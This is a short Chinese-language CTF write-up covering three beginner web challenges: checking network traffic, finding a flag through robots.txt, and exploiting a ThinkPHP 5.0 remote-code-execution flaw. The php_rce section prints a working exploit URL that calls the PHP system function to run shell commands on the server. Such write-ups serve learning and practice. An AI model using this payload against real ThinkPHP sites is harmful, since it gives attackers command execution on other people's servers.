baby_web
EMMMM,這就是一個簽到題~
解題方法:
F12→Networks→重繪抓包→完成
Training-WWW-Robots
看題目可以知道這道題考的是爬蟲協議(robots.txt檔案)的知識
打開網頁,果然~
他在網頁里還暗示了一下,Sometimes these files reveal the directory structure instead protecting the content from being crawled.(有時這些檔案暴露了目錄結構,而不是保護內容被抓取,)
好吧!我們直接打開robots.txt看看吧
好嘛~ 夠直接的,,,
接下來就沒啥說的,直接訪問fl0g.php這個頁面就可以了
到這里我們就拿到了這道題的FLAG!
推薦相關文章
《關于robots.txt檔案的安全問題》
《robots.txt檔案問題攻略大全》
php_rce
打開后,提示使用的thinkphp v5.0版本
然后根據題目提示直接谷歌thinkphp rce漏洞,推薦文章《THINKPHP 5.X RCE 漏洞分析與利用總結》
然后直接構造payload
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27
得到FLAG!
相關文章推薦:
《說說RCE那些事兒》
《ThinkPHP5 RCE漏洞重現及分析》
點進來的小伙伴想學習更多網路安全知識就請關注我的公眾號吧??
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/33714.html
標籤:其他